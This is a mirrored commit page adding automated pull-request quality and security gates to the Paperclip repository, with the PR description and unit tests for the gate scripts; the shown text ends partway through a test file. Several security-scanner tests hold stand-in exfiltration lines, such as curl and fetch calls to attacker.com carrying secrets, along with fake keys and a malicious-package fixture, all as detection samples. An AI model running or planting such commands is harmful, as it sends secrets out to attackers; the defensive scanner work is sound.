ake/paperclip
1
0
Fork 0
mirror of https://github.com/alkimake/paperclip.git synced 2026-06-14 01:50:39 +09:00
Code Issues Projects Releases Packages Wiki Activity

feat(commitperclip): add automated PR quality and security gates (#6469)

Browse source 
Fixes #6470

## Thinking Path

> - Paperclip is an open-source AI agent platform receiving a high
volume of community PRs — currently 2,398 open
> - The contributor experience is broken: PRs sit for months with no
feedback, contributors don't know why they're stuck, and maintainers
spend review time on PRs that are missing basics
> - Common problems: no linked issue, no test coverage, incomplete PR
template, manually-edited lockfile — all catchable before human review
> - At the same time, accepting untrusted PRs from unknown contributors
is a real attack surface: malicious packages, secret injection,
tampering with CI scripts, and code touching the sensitive paths from
the April security advisories
> - This PR adds automated gates that run on every PR: quality failures
get a clear comment telling contributors exactly what to fix, security
concerns are silently flagged as draft advisories and block merge via a
pending check run
> - The benefit is a dramatically faster feedback loop for good-faith
contributors and a meaningful security layer for the maintainers
reviewing them

## What Changed

- **`.github/workflows/commitperclip-review.yml`** — new workflow using
`pull_request_target` (runs in base branch context, has secrets, never
executes PR code). Runs quality gates + security gates on every PR
open/update.
- **`.github/dependabot.yml`** — weekly automated dependency
vulnerability PRs for npm and GitHub Actions.
- **`.github/scripts/get-bot-token.mjs`** — generates a short-lived
commitperclip installation token from `COMMITPERCLIP_KEY` secret.
- **`.github/scripts/run-quality-gates.mjs`** — orchestrates 5 quality
gates, posts/updates a single consolidated comment on the PR.
- **`.github/scripts/check-pr-template.mjs`** — validates all 5 required
template sections, Thinking Path depth (≥3 sentences), Model Used not
placeholder.
- **`.github/scripts/check-pr-linked-issue.mjs`** — requires `Fixes
#NNN` or issue URL in PR body.
- **`.github/scripts/check-pr-test-coverage.mjs`** — requires at least
one test file in the diff.
- **`.github/scripts/check-pr-lockfile.mjs`** — blocks manual
`pnpm-lock.yaml` edits (only the refresh bot may change it).
- **`.github/scripts/check-pr-dependencies.mjs`** — informational
comment when new npm packages are added.
- **`.github/scripts/check-pr-security.mjs`** — 6 silent security
checks: secret patterns, CI workflow tampering, build script changes,
supply chain (new packages in lockfile), suspicious test patterns
(outbound network/shell exec/env var reads), and changes to the 9
sensitive path prefixes from the April advisories. When any fire:
creates a draft security advisory + sets `security-review` check to
`in_progress` (blocks merge). When clean: sets `security-review` to
`success`.
- **`actions/dependency-review-action@v4`** — per-PR dependency
vulnerability check (fails if new dep has known CVE).
- **44 unit tests** across all gate modules (`node:test`, no external
deps).

## Verification

Run all unit tests locally:
```bash
node --test .github/scripts/tests/*.test.mjs
```
Expected: 44 pass, 0 fail.

End-to-end: open a PR missing the template, linked issue, and test files
→ commitperclip posts a consolidated comment listing all failures. Open
a PR with all gates satisfied → ` All checks passing` comment posted,
all check runs green.

## Risks

**`pull_request_target` security model:** This workflow runs in base
branch context and has access to secrets. It explicitly checks out `ref:
master` (never PR code) and reads the PR diff via GitHub API only — no
PR code is ever executed. This is the correct pattern for running
secret-bearing checks on fork PRs; deviating from it (e.g. checking out
the PR branch) would be a security vulnerability.

**False positives on security gates:** The sensitive-path gate flags any
PR touching the 9 path prefixes from the April advisories. Legitimate
fixes to those paths will trigger draft advisories. This is intentional
— those paths warrant a human look regardless. The `security-review`
check can be manually resolved by a maintainer once reviewed.

**commitperclip not yet installed:** Until the app is installed on this
repo and the `COMMITPERCLIP_KEY` secret is added, the workflow will fail
on the token generation step. The quality gate comment won't post, but
Dependency Review will still run independently.

## Model Used

Claude Sonnet 4.5, 200k context window, extended thinking enabled, tool
use: read/edit files, bash execution, GitHub API calls

## Checklist

- [x] I have included a thinking path that traces from project context
to this change
- [x] I have specified the model used (with version and capability
details)
- [x] I have checked ROADMAP.md and confirmed this PR does not duplicate
planned core work
- [x] I have run tests locally and they pass (44/44)
- [x] I have added or updated tests where applicable (44 unit tests
across all gate modules)
- [ ] If this change affects the UI, I have included before/after
screenshots (N/A — CI only)
- [x] I have updated relevant documentation to reflect my changes
- [x] I have considered and documented any risks above
- [x] I will address all Greptile and reviewer comments before
requesting merge

---

## One-time setup needed from you, Dotta

1. **Install commitperclip app** on this repo:
https://github.com/apps/commitperclip/installations/new
2. **Add `COMMITPERCLIP_KEY`** as a repository secret (Actions →
Secrets) — ask @brandonburr for the key
3. **Add `security_advisories: write` and `checks: write`** to the
commitperclip app permissions (commit-capital org → Settings → Apps →
commitperclip → Permissions)
4. **Install Socket.dev** from GitHub Marketplace for supply chain
scanning
5. **Branch protection** (optional but recommended): require
`commitperclip-review` and `security-review` checks to pass before merge

## Dashboard integration note

The `commitperclip-review` check run result maps cleanly to your PR
triage dashboard. A single filter on your Worker:

```javascript
const gatesCheck = checkRuns.find(r => r.name === 'commitperclip-review');
if (gatesCheck?.conclusion === 'failure') return null; // filter from queue
```

For security flags: `GET
/repos/paperclipai/paperclip/security-advisories?state=draft` — advisory
titles include `PR #NNN` for cross-referencing. PRs with a matching
draft advisory have `security-review` in `in_progress` state (grey
spinner, can't merge via branch protection).

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: Devin Foley <devin@devinfoley.com>
Co-authored-by: Paperclip <noreply@paperclip.ing>
This commit is contained in:
brandonburr 2026-06-01 10:52:53 -06:00 committed by GitHub
parent 9f8636cf49
commit 96feaa331a
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
21 changed files with 1929 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

65
.github/scripts/tests/check-pr-dependencies.test.mjs vendored Normal file
View file

@ -0,0 +1,65 @@
import { test } from 'node:test';
import assert from 'node:assert/strict';
import { checkDependencies, resolveBaseRef } from '../check-pr-dependencies.mjs';
test('resolveBaseRef: returns the explicit base ref without making API calls', async () => {
const baseRef = await resolveBaseRef(async () => {
throw new Error('should not fetch');
}, 'token', 'paperclipai/paperclip', 6469, 'release/1.2');
assert.equal(baseRef, 'release/1.2');
});
test('resolveBaseRef: falls back to the PR base ref', async () => {
const seenPaths = [];
const baseRef = await resolveBaseRef(async (path) => {
seenPaths.push(path);
return { base: { ref: 'main' } };
}, 'token', 'paperclipai/paperclip', 6469);
assert.equal(baseRef, 'main');
assert.deepEqual(seenPaths, ['/repos/paperclipai/paperclip/pulls/6469']);
});
test('checkDependencies: compares package files against the resolved base ref instead of master', async () => {
const seenPaths = [];
const result = await checkDependencies(
[{ filename: 'packages/foo/package.json', status: 'modified' }],
'token',
'paperclipai/paperclip',
6469,
'release/1.2',
async (path) => {
seenPaths.push(path);
if (path.includes('ref=release%2F1.2')) {
return {
content: Buffer.from(JSON.stringify({
dependencies: { existing: '^1.0.0' },
})).toString('base64'),
};
}
if (path.includes('ref=refs%2Fpull%2F6469%2Fhead')) {
return {
content: Buffer.from(JSON.stringify({
dependencies: {
existing: '^1.0.0',
added: '^2.0.0',
},
})).toString('base64'),
};
}
throw new Error(`Unexpected path: ${path}`);
}
);
assert.equal(result.passed, true);
assert.equal(result.informational.length, 1);
assert.match(result.informational[0], /`added`/);
assert.deepEqual(seenPaths, [
'/repos/paperclipai/paperclip/contents/packages/foo/package.json?ref=release%2F1.2',
'/repos/paperclipai/paperclip/contents/packages/foo/package.json?ref=refs%2Fpull%2F6469%2Fhead',
]);
});

111
.github/scripts/tests/check-pr-linked-issue.test.mjs vendored Normal file
View file

@ -0,0 +1,111 @@
import { test } from 'node:test';
import assert from 'node:assert/strict';
import { checkLinkedIssue } from '../check-pr-linked-issue.mjs';
// Existing tests with title parameter added (defaults to no prefix, so still required)
test('passes with bare #NNN reference', () => {
assert.equal(checkLinkedIssue('This fixes the bug in #123', 'fix: something').passed, true);
});
test('passes with "Fixes #NNN"', () => {
assert.equal(checkLinkedIssue('Fixes #456\n\nSome description', 'fix: something').passed, true);
});
test('passes with "Closes #NNN" (case-insensitive)', () => {
assert.equal(checkLinkedIssue('closes #789', 'fix: something').passed, true);
});
test('passes with "Resolves #NNN"', () => {
assert.equal(checkLinkedIssue('Resolves #101', 'fix: something').passed, true);
});
test('passes with full github.com URL', () => {
assert.equal(
checkLinkedIssue('See https://github.com/paperclipai/paperclip/issues/202', 'fix: bug').passed,
true
);
});
test('passes with a full github.com URL followed by punctuation', () => {
assert.equal(
checkLinkedIssue('See (https://github.com/paperclipai/paperclip/issues/202).', 'fix: bug').passed,
true
);
});
test('fails with empty body when no skip prefix', () => {
const result = checkLinkedIssue('', 'fix: bug');
assert.equal(result.passed, false);
assert.ok(result.failures.length > 0);
});
test('fails with no issue reference when no skip prefix', () => {
const result = checkLinkedIssue('Added a cool feature, no issue linked', 'feat: something');
assert.equal(result.passed, false);
assert.ok(result.failures[0].includes('Fixes #NNN'));
});
test('fails with cross-repo issue reference', () => {
const result = checkLinkedIssue('See https://github.com/other/repo/issues/123', 'fix: bug');
assert.equal(result.passed, false);
});
test('fails when the Paperclip issue URL is embedded inside another host', () => {
const result = checkLinkedIssue(
'See https://evil.example/https://github.com/paperclipai/paperclip/issues/123',
'fix: bug'
);
assert.equal(result.passed, false);
});
test('fails when the Paperclip issue URL continues into another host', () => {
const result = checkLinkedIssue(
'See https://github.com/paperclipai/paperclip/issues/123.evil.example',
'fix: bug'
);
assert.equal(result.passed, false);
});
test('fails when #NNN is part of a word (no space before)', () => {
const result = checkLinkedIssue('This is version#123 not an issue link', 'fix: bug');
assert.equal(result.passed, false);
});
// New tests for prefix-aware skip behavior
test('skips check for docs: prefix', () => {
assert.equal(checkLinkedIssue('', 'docs: update README').passed, true);
});
test('skips check for chore: prefix', () => {
assert.equal(checkLinkedIssue('', 'chore: bump deps').passed, true);
});
test('skips check for build: prefix', () => {
assert.equal(checkLinkedIssue('', 'build: update Dockerfile').passed, true);
});
test('skips check for ci: prefix', () => {
assert.equal(checkLinkedIssue('', 'ci: add workflow').passed, true);
});
test('skips check for test: prefix', () => {
assert.equal(checkLinkedIssue('', 'test: add coverage').passed, true);
});
test('skips check with scoped prefix like docs(api):', () => {
assert.equal(checkLinkedIssue('', 'docs(api): document endpoint').passed, true);
});
test('requires issue for feat: prefix', () => {
assert.equal(checkLinkedIssue('Some description without issue', 'feat: new thing').passed, false);
});
test('requires issue for refactor: prefix', () => {
assert.equal(checkLinkedIssue('Some refactor', 'refactor: rewrite thing').passed, false);
});
test('requires issue when no prefix (encourages prefix usage)', () => {
assert.equal(checkLinkedIssue('No prefix here', 'Add some feature').passed, false);
});

33
.github/scripts/tests/check-pr-lockfile.test.mjs vendored Normal file
View file

@ -0,0 +1,33 @@
import { test } from 'node:test';
import assert from 'node:assert/strict';
import { checkLockfile } from '../check-pr-lockfile.mjs';
const makeFiles = (filenames) => filenames.map(f => ({ filename: f, status: 'modified' }));
test('passes when lockfile is not changed', () => {
assert.equal(checkLockfile(makeFiles(['src/foo.ts']), 'someuser', 'fix/bug').passed, true);
});
test('passes when lockfile changed by refresh bot on correct branch', () => {
const result = checkLockfile(
makeFiles(['pnpm-lock.yaml']),
'github-actions[bot]',
'chore/refresh-lockfile'
);
assert.equal(result.passed, true);
});
test('fails when lockfile changed by regular user', () => {
const result = checkLockfile(makeFiles(['pnpm-lock.yaml']), 'someuser', 'fix/bug');
assert.equal(result.passed, false);
assert.ok(result.failures[0].includes('pnpm-lock.yaml'));
});
test('fails when lockfile changed by bot on wrong branch', () => {
const result = checkLockfile(
makeFiles(['pnpm-lock.yaml']),
'github-actions[bot]',
'fix/something-else'
);
assert.equal(result.passed, false);
});

316
.github/scripts/tests/check-pr-security.test.mjs vendored Normal file
View file

@ -0,0 +1,316 @@
import { test } from 'node:test';
import assert from 'node:assert/strict';
import {
buildAdvisoryPayload,
findExistingDraftAdvisory,
postSecurityCheckRun,
scanSecrets,
scanCITampering,
scanBuildScripts,
scanSupplyChain,
scanTestPatterns,
scanSensitivePaths,
syncDraftAdvisory,
validateSensitivePaths,
} from '../check-pr-security.mjs';
// ── scanSecrets ──────────────────────────────────────────────────────────────
test('scanSecrets: flags OpenAI key in added line', () => {
const files = [{ filename: 'src/config.ts', patch: '+const key = "sk-abcdefghijklmnopqrstuvwxyz123456"' }];
assert.ok(scanSecrets(files).length > 0);
});
test('scanSecrets: flags AWS key in added line', () => {
const files = [{ filename: 'src/config.ts', patch: '+const awsKey = "AKIAIOSFODNN7EXAMPLE"' }];
assert.ok(scanSecrets(files).length > 0);
});
test('scanSecrets: ignores removed lines', () => {
const files = [{ filename: 'src/config.ts', patch: '-const key = "sk-abcdefghijklmnopqrstuvwxyz123456"' }];
assert.equal(scanSecrets(files).length, 0);
});
test('scanSecrets: ignores files without patch', () => {
assert.equal(scanSecrets([{ filename: 'large-file.ts' }]).length, 0);
});
// ── scanCITampering ──────────────────────────────────────────────────────────
test('scanCITampering: flags workflow file changes', () => {
const files = [{ filename: '.github/workflows/pr.yml', status: 'modified' }];
assert.ok(scanCITampering(files).length > 0);
});
test('scanCITampering: ignores non-workflow files', () => {
const files = [{ filename: 'src/foo.ts', status: 'modified' }];
assert.equal(scanCITampering(files).length, 0);
});
test('scanCITampering: ignores removed workflow files', () => {
const files = [{ filename: '.github/workflows/old.yml', status: 'removed' }];
assert.equal(scanCITampering(files).length, 0);
});
// ── scanBuildScripts ─────────────────────────────────────────────────────────
test('scanBuildScripts: flags changes to release.sh', () => {
const files = [{ filename: 'scripts/release.sh', status: 'modified' }];
assert.ok(scanBuildScripts(files).length > 0);
});
test('scanBuildScripts: ignores non-CI scripts', () => {
const files = [{ filename: 'scripts/generate-org-chart-images.ts', status: 'modified' }];
assert.equal(scanBuildScripts(files).length, 0);
});
// ── scanSupplyChain ──────────────────────────────────────────────────────────
test('scanSupplyChain: flags net-new packages in lockfile', () => {
const patch = `@@ -1,3 +1,4 @@
packages:
+ 'evil-package@1.0.0':
'existing-package@2.0.0':
- 'old-package@1.0.0':
`;
const files = [{ filename: 'pnpm-lock.yaml', patch }];
const flags = scanSupplyChain(files);
assert.ok(flags.length > 0);
assert.ok(flags[0].packages.includes('evil-package'));
});
test('scanSupplyChain: does not flag version-only bumps', () => {
const patch = `@@ -1,3 +1,3 @@
packages:
- 'existing-package@1.0.0':
+ 'existing-package@2.0.0':
`;
const files = [{ filename: 'pnpm-lock.yaml', patch }];
assert.equal(scanSupplyChain(files).length, 0);
});
test('scanSupplyChain: flags pnpm v9-style unquoted package entries', () => {
const patch = `@@ -1,2 +1,3 @@
+evil-package@1.0.0:
existing-package@2.0.0:
`;
const files = [{ filename: 'pnpm-lock.yaml', patch }];
const flags = scanSupplyChain(files);
assert.deepEqual(flags, [{ check: 'supply-chain', packages: ['evil-package'] }]);
});
test('scanSupplyChain: ignores peer suffixes when matching package names', () => {
const patch = `@@ -1,2 +1,2 @@
-@scope/pkg@1.0.0(react@18.2.0):
+@scope/pkg@2.0.0(react@18.2.0):
`;
const files = [{ filename: 'pnpm-lock.yaml', patch }];
assert.equal(scanSupplyChain(files).length, 0);
});
test('scanSupplyChain: flags net-new packages that include pnpm peer suffixes', () => {
const patch = `@@ -1,2 +1,3 @@
+evil-package@1.0.0(react@18.2.0):
existing-package@2.0.0:
`;
const files = [{ filename: 'pnpm-lock.yaml', patch }];
const flags = scanSupplyChain(files);
assert.deepEqual(flags, [{ check: 'supply-chain', packages: ['evil-package'] }]);
});
test('findExistingDraftAdvisory: returns matching draft advisory from paginated results', async () => {
const calls = [];
const fakeFetch = async (path) => {
calls.push(path);
if (/[?&]page=1(?:&|$)/.test(path)) {
return Array.from({ length: 100 }, (_, i) => ({ summary: `Unrelated advisory ${i}` }));
}
if (/[?&]page=2(?:&|$)/.test(path)) {
return [{ summary: '🚨 Security flag — PR #6469: ci-tampering' }];
}
return [];
};
const advisory = await findExistingDraftAdvisory(fakeFetch, 'token', 'paperclipai/paperclip', 6469);
assert.deepEqual(advisory, { summary: '🚨 Security flag — PR #6469: ci-tampering' });
assert.equal(calls.length, 2);
});
test('findExistingDraftAdvisory: returns null when no matching draft advisory exists', async () => {
const fakeFetch = async () => [{ summary: 'Completely different advisory' }];
const advisory = await findExistingDraftAdvisory(fakeFetch, 'token', 'paperclipai/paperclip', 6469);
assert.equal(advisory, null);
});
test('syncDraftAdvisory: patches an existing advisory with the latest flags', async () => {
const calls = [];
const flags = [
{ check: 'ci-tampering', file: '.github/workflows/pr.yml' },
{ check: 'secret-scan', file: 'src/config.ts', pattern: 'OpenAI API key' },
];
await syncDraftAdvisory(async (path, token, options) => {
calls.push({ path, token, options });
if (path.includes('/security-advisories?state=draft')) {
return [{ ghsa_id: 'GHSA-test-1234', summary: '🚨 Security flag — PR #6469: ci-tampering' }];
}
return { ok: true };
}, 'token', 'paperclipai/paperclip', 6469, 'My PR', flags);
assert.equal(calls.length, 2);
assert.equal(calls[1].path, '/repos/paperclipai/paperclip/security-advisories/GHSA-test-1234');
assert.equal(calls[1].options.method, 'PATCH');
assert.deepEqual(JSON.parse(calls[1].options.body), buildAdvisoryPayload(6469, 'My PR', flags));
});
test('syncDraftAdvisory: creates a new advisory when none exists', async () => {
const calls = [];
const flags = [{ check: 'supply-chain', packages: ['evil-package'] }];
await syncDraftAdvisory(async (path, token, options) => {
calls.push({ path, token, options });
if (path.includes('/security-advisories?state=draft')) {
return [];
}
return { ok: true };
}, 'token', 'paperclipai/paperclip', 6469, 'My PR', flags);
assert.equal(calls.length, 2);
assert.equal(calls[1].path, '/repos/paperclipai/paperclip/security-advisories');
assert.equal(calls[1].options.method, 'POST');
assert.deepEqual(JSON.parse(calls[1].options.body), buildAdvisoryPayload(6469, 'My PR', flags));
});
test('postSecurityCheckRun: uses the injected fetch implementation', async () => {
const calls = [];
await postSecurityCheckRun(async (path, token, options) => {
calls.push({ path, token, options });
return { ok: true };
}, 'token', 'paperclipai/paperclip', 'deadbeef', true);
assert.equal(calls.length, 1);
assert.equal(calls[0].path, '/repos/paperclipai/paperclip/check-runs');
assert.equal(calls[0].options.method, 'POST');
assert.deepEqual(JSON.parse(calls[0].options.body), {
name: 'security-review',
head_sha: 'deadbeef',
status: 'in_progress',
output: {
title: 'Security Review Pending',
summary: 'This PR has been flagged for manual security review by a maintainer. No action needed from you.',
},
});
});
test('validateSensitivePaths: checks paths against the resolved base ref instead of master', async () => {
const seenPaths = [];
const stale = await validateSensitivePaths(
'token',
'paperclipai/paperclip',
6469,
'release/1.2',
async (path) => {
seenPaths.push(path);
return { ok: true };
},
);
assert.deepEqual(stale, []);
assert.ok(seenPaths.every(path => path.includes('ref=release%2F1.2')));
assert.ok(!seenPaths.some(path => path.includes('ref=master')));
});
test('validateSensitivePaths: returns only 404 paths and rethrows non-404 errors', async () => {
let seen404 = false;
const stale = await validateSensitivePaths(
'token',
'paperclipai/paperclip',
6469,
'main',
async (path) => {
if (!seen404) {
seen404 = true;
throw new Error('GitHub API GET /contents/foo → 404: missing');
}
return { ok: true };
},
);
assert.equal(stale.length, 1);
await assert.rejects(
validateSensitivePaths(
'token',
'paperclipai/paperclip',
6469,
'main',
async () => {
throw new Error('GitHub API GET /contents/foo → 500: boom');
},
),
/500: boom/
);
});
// ── scanTestPatterns ─────────────────────────────────────────────────────────
test('scanTestPatterns: flags outbound fetch in test file', () => {
const files = [{
filename: 'src/foo.test.ts',
patch: `+ const res = await fetch('https://attacker.com/collect')`,
}];
assert.ok(scanTestPatterns(files).length > 0);
});
test('scanTestPatterns: flags execSync in test file', () => {
const files = [{
filename: 'src/foo.test.ts',
patch: `+ execSync('curl https://attacker.com?data=' + secret)`,
}];
assert.ok(scanTestPatterns(files).length > 0);
});
test('scanTestPatterns: ignores suspicious patterns in non-test files', () => {
const files = [{
filename: 'src/api.ts',
patch: `+ const res = await fetch('https://api.example.com')`,
}];
assert.equal(scanTestPatterns(files).length, 0);
});
test('scanTestPatterns: flags suspicious patterns in __tests__ directories', () => {
const files = [{
filename: 'src/__tests__/foo.ts',
patch: `+ execSync('curl https://attacker.com?data=' + secret)`,
}];
assert.ok(scanTestPatterns(files).length > 0);
});
// ── scanSensitivePaths ───────────────────────────────────────────────────────
test('scanSensitivePaths: flags changes to agents route (API key IDOR / cross-tenant)', () => {
const files = [{ filename: 'server/src/routes/agents.ts', status: 'modified' }];
assert.ok(scanSensitivePaths(files).length > 0);
});
test('scanSensitivePaths: flags changes to MarkdownBody (XSS via urlTransform)', () => {
const files = [{ filename: 'ui/src/components/MarkdownBody.tsx', status: 'modified' }];
assert.ok(scanSensitivePaths(files).length > 0);
});
test('scanSensitivePaths: flags changes to company-skills route (malicious skill exfil)', () => {
const files = [{ filename: 'server/src/routes/company-skills.ts', status: 'modified' }];
assert.ok(scanSensitivePaths(files).length > 0);
});
test('scanSensitivePaths: ignores unrelated paths', () => {
const files = [{ filename: 'server/src/utils/date.ts', status: 'modified' }];
assert.equal(scanSensitivePaths(files).length, 0);
});
test('scanSensitivePaths: ignores removed files even on sensitive paths', () => {
const files = [{ filename: 'server/src/routes/agents.ts', status: 'removed' }];
assert.equal(scanSensitivePaths(files).length, 0);
});

123
.github/scripts/tests/check-pr-template.test.mjs vendored Normal file
View file

@ -0,0 +1,123 @@
import { test } from 'node:test';
import assert from 'node:assert/strict';
import { checkTemplate } from '../check-pr-template.mjs';
const VALID_BODY = `
## Thinking Path
First I considered the root cause of the bug in the cursor logic. Then I traced the execution path through the pagination code. Finally I identified that the date binding was missing a toISOString call.
## What Changed
- Added .toISOString() call before binding anchor.createdAt to the postgres query
## Verification
Run pnpm test:run:general and verify the cursor pagination tests pass.
## Risks
Low risk isolated change to one query parameter.
## Model Used
Claude Sonnet 4.5, 200k context window, extended thinking enabled, tool use: read/edit files
`;
test('passes with valid full template', () => {
const result = checkTemplate(VALID_BODY);
assert.equal(result.passed, true);
assert.deepEqual(result.failures, []);
});
test('fails when Thinking Path section is missing', () => {
const body = VALID_BODY.replace('## Thinking Path', '## Removed');
const result = checkTemplate(body);
assert.equal(result.passed, false);
assert.ok(result.failures.some(f => f.includes('Thinking Path')));
});
test('fails when Thinking Path has fewer than 3 sentences', () => {
const body = VALID_BODY.replace(
/## Thinking Path\n[\s\S]*?\n## What Changed/,
'## Thinking Path\nOnly one sentence here.\n\n## What Changed'
);
const result = checkTemplate(body);
assert.equal(result.passed, false);
assert.ok(result.failures.some(f => f.includes('Thinking Path') && f.includes('sentence')));
});
test('passes Thinking Path written as a bullet list without terminal punctuation', () => {
const body = VALID_BODY.replace(
/## Thinking Path\n[\s\S]*?\n## What Changed/,
`## Thinking Path
- First point about the root cause of the bug
- Second point about how the fix addresses it
- Third point about why this approach was chosen
## What Changed`
);
const result = checkTemplate(body);
assert.equal(result.passed, true);
assert.deepEqual(result.failures, []);
});
test('passes Thinking Path written as a blockquoted bullet list', () => {
const body = VALID_BODY.replace(
/## Thinking Path\n[\s\S]*?\n## What Changed/,
`## Thinking Path
> - First point in a blockquote
> - Second point in a blockquote
> - Third point in a blockquote
## What Changed`
);
const result = checkTemplate(body);
assert.equal(result.passed, true);
assert.deepEqual(result.failures, []);
});
test('passes Thinking Path written as multiple paragraphs without terminal punctuation', () => {
const body = VALID_BODY.replace(
/## Thinking Path\n[\s\S]*?\n## What Changed/,
`## Thinking Path
First paragraph explaining the situation in detail
Second paragraph explaining the chosen approach in detail
Third paragraph explaining the tradeoffs in detail
## What Changed`
);
const result = checkTemplate(body);
assert.equal(result.passed, true);
assert.deepEqual(result.failures, []);
});
test('fails when Model Used section is missing', () => {
const body = VALID_BODY.replace('## Model Used', '## Removed');
const result = checkTemplate(body);
assert.equal(result.passed, false);
assert.ok(result.failures.some(f => f.includes('Model Used')));
});
test('fails when Model Used contains placeholder text', () => {
const body = VALID_BODY.replace(
/## Model Used\n[\s\S]*/,
'## Model Used\nprovider, model id/version, context window, reasoning mode, tool use'
);
const result = checkTemplate(body);
assert.equal(result.passed, false);
assert.ok(result.failures.some(f => f.includes('Model Used') && f.includes('placeholder')));
});
test('fails when What Changed section is empty', () => {
const body = VALID_BODY.replace(
/## What Changed\n[\s\S]*?\n## Verification/,
'## What Changed\n\n## Verification'
);
const result = checkTemplate(body);
assert.equal(result.passed, false);
assert.ok(result.failures.some(f => f.includes('What Changed')));
});
test('returns multiple failures at once', () => {
const result = checkTemplate('');
assert.equal(result.passed, false);
assert.ok(result.failures.length >= 5);
});

101
.github/scripts/tests/check-pr-test-coverage.test.mjs vendored Normal file
View file

@ -0,0 +1,101 @@
import { test } from 'node:test';
import assert from 'node:assert/strict';
import { checkTestCoverage } from '../check-pr-test-coverage.mjs';
const makeFiles = (filenames) =>
filenames.map(filename => ({ filename, status: 'modified' }));
// Existing tests with title parameter added (fix: prefix means test required)
test('passes when .test.ts file is changed', () => {
assert.equal(checkTestCoverage(makeFiles(['src/foo.test.ts', 'src/foo.ts']), 'fix: bug').passed, true);
});
test('passes when .spec.js file is changed', () => {
assert.equal(checkTestCoverage(makeFiles(['src/bar.spec.js']), 'fix: bug').passed, true);
});
test('passes when file under tests/ is changed', () => {
assert.equal(checkTestCoverage(makeFiles(['tests/unit/baz.ts']), 'fix: bug').passed, true);
});
test('passes when file under __tests__ is changed', () => {
assert.equal(checkTestCoverage(makeFiles(['src/__tests__/qux.ts']), 'fix: bug').passed, true);
});
test('fails when fix: PR has no tests', () => {
const result = checkTestCoverage(makeFiles(['src/foo.ts', 'src/bar.ts']), 'fix: bug');
assert.equal(result.passed, false);
assert.ok(result.failures[0].includes('test'));
});
test('fails when feat: PR has no tests', () => {
const result = checkTestCoverage(makeFiles(['src/foo.ts']), 'feat: new feature');
assert.equal(result.passed, false);
});
test('fails with empty file list and fix: prefix', () => {
assert.equal(checkTestCoverage([], 'fix: bug').passed, false);
});
test('ignores removed test files', () => {
const files = [
{ filename: 'src/foo.test.ts', status: 'removed' },
{ filename: 'src/foo.ts', status: 'modified' },
];
assert.equal(checkTestCoverage(files, 'fix: bug').passed, false);
});
// New tests for prefix-aware skip behavior
test('skips test requirement for docs: prefix (markdown only)', () => {
assert.equal(checkTestCoverage(makeFiles(['README.md', 'docs/setup.md']), 'docs: update guide').passed, true);
});
test('skips test requirement for chore: prefix (config only)', () => {
assert.equal(checkTestCoverage(makeFiles(['.gitignore', '.github/labels.yml']), 'chore: cleanup').passed, true);
});
test('skips test requirement for refactor: prefix', () => {
assert.equal(checkTestCoverage(makeFiles(['src/foo.ts']), 'refactor: rename function').passed, true);
});
test('skips test requirement for style: prefix', () => {
assert.equal(checkTestCoverage(makeFiles(['src/foo.ts']), 'style: format').passed, true);
});
// New tests for mismatch detection
test('flags docs: PR with source code changes', () => {
const result = checkTestCoverage(makeFiles(['src/api.ts', 'README.md']), 'docs: update docs');
assert.equal(result.passed, false);
assert.ok(result.failures[0].includes('docs:'));
assert.ok(result.failures[0].includes('source code'));
});
test('flags chore: PR with source code changes', () => {
const result = checkTestCoverage(makeFiles(['src/server.ts']), 'chore: cleanup');
assert.equal(result.passed, false);
assert.ok(result.failures[0].includes('chore:'));
});
test('does NOT flag chore: PR with only config files', () => {
const result = checkTestCoverage(makeFiles(['package.json', '.eslintrc.js']), 'chore: bump');
// .eslintrc.js is a .js file but it's config — current rule will flag it. This documents that.
// For now we err on the side of flagging — contributor can retitle if needed.
assert.equal(result.passed, false);
});
test('does NOT flag refactor: PR with source code (refactor expects source changes)', () => {
const result = checkTestCoverage(makeFiles(['src/foo.ts']), 'refactor: rename');
assert.equal(result.passed, true);
});
test('requires test when no prefix used', () => {
const result = checkTestCoverage(makeFiles(['src/foo.ts']), 'Some PR with no prefix');
assert.equal(result.passed, false);
});
test('handles scoped prefix like fix(server):', () => {
assert.equal(checkTestCoverage(makeFiles(['src/foo.test.ts', 'src/foo.ts']), 'fix(server): bug').passed, true);
});

37
.github/scripts/tests/fetch-pr-files.test.mjs vendored Normal file
View file

@ -0,0 +1,37 @@
import { test } from 'node:test';
import assert from 'node:assert/strict';
import { fetchAllPullRequestFiles } from '../fetch-pr-files.mjs';
test('fetchAllPullRequestFiles: returns a single short page', async () => {
const seenPaths = [];
const files = await fetchAllPullRequestFiles(async (path) => {
seenPaths.push(path);
return [{ filename: 'src/only.ts' }];
}, 'paperclipai/paperclip', 6469, 'token');
assert.deepEqual(seenPaths, [
'/repos/paperclipai/paperclip/pulls/6469/files?per_page=100&page=1',
]);
assert.equal(files.length, 1);
});
test('fetchAllPullRequestFiles: keeps fetching when a page is full', async () => {
const seenPaths = [];
const files = await fetchAllPullRequestFiles(async (path) => {
seenPaths.push(path);
const page = Number(new URL(`https://github.com${path}`).searchParams.get('page'));
if (page === 1) {
return Array.from({ length: 100 }, (_, index) => ({
filename: `src/file-${index + 1}.ts`,
}));
}
return [{ filename: 'src/file-101.ts' }];
}, 'paperclipai/paperclip', 6469, 'token');
assert.deepEqual(seenPaths, [
'/repos/paperclipai/paperclip/pulls/6469/files?per_page=100&page=1',
'/repos/paperclipai/paperclip/pulls/6469/files?per_page=100&page=2',
]);
assert.equal(files.length, 101);
assert.equal(files.at(-1)?.filename, 'src/file-101.ts');
});

33
.github/scripts/tests/get-bot-token.test.mjs vendored Normal file
View file

@ -0,0 +1,33 @@
import { test } from 'node:test';
import assert from 'node:assert/strict';
import { resolveInstallationId } from '../get-bot-token.mjs';
test('resolveInstallationId: uses the repo installation endpoint when repo context is available', async () => {
const seenPaths = [];
const installationId = await resolveInstallationId(async (path) => {
seenPaths.push(path);
return { id: 42 };
}, 'jwt', 'paperclipai/paperclip', 'paperclipai');
assert.equal(installationId, 42);
assert.deepEqual(seenPaths, ['/repos/paperclipai/paperclip/installation']);
});
test('resolveInstallationId: falls back to the matching owner installation', async () => {
const installationId = await resolveInstallationId(async () => ([
{ id: 1, account: { login: 'someone-else' } },
{ id: 7, account: { login: 'PaperclipAI' } },
]), 'jwt', undefined, 'paperclipai');
assert.equal(installationId, 7);
});
test('resolveInstallationId: rejects ambiguous installations without repo or owner context', async () => {
await assert.rejects(
resolveInstallationId(async () => ([
{ id: 1, account: { login: 'org-one' } },
